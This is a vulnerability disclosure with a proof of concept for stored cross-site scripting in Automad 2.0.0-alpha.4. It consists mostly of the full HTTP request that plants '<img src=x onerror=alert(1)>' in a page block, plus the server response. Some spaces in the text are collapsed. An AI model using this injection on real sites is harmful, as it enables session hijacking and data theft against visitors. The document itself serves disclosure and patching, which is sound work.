Automad 2.0.0-alpha.4 Cross Site Scripting

# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)# Date: 20-06-2024# Exploit Author: Jerry Thomas (w3bn00b3r)# Vendor Homepage: https://automad.org# Software Link: https://github.com/marcantondahmen/automad# Category: Web Application [Flat File CMS]# Version: 2.0.0-alpha.4# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11(bullseye)# DescriptionA persistent (stored) cross-site scripting (XSS) vulnerability has beenidentified in Automad 2.0.0-alpha.4. This vulnerability enables an attackerto inject malicious JavaScript code into the template body. The injectedcode is stored within the flat file CMS and is executed in the browser ofany user visiting the forum. This can result in session hijacking, datatheft, and other malicious activities.# Proof-of-Concept*Step-1:* Login as Admin & Navigate to the endpointhttp://localhost/dashboard/home*Step-2:* There will be a default Welcome page. You will find an option toedit it.*Step-3:* Navigate to Content tab orhttp://localhost/dashboard/page?url=%2F&section=text & edit the block named***`Main`****Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)>*Request:*POST /_api/page/data HTTP/1.1Host: localhostContent-Length: 1822User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCvAccept: */*Origin: http://localhostReferer: http://localhost/dashboard/page?url=%2F&section=textAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie:Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cbConnection: close------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__csrf__"49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__json__"{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testingforxss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSSidentified byJerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"Youhave successfully installed Automad 2.<br><br><img src=xonerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"VisitDashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}------WebKitFormBoundaryzHmXQBdtZsTYQYCv--*Response:*HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 20 Jun 2024 19:17:35 GMTContent-Type: application/json; charset=utf-8Connection: closeX-Powered-By: PHP/8.3.6Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 30`{"code":200,"time":1718911055}*Step-5:* XSS triggers when you go to homepage - http://localhost/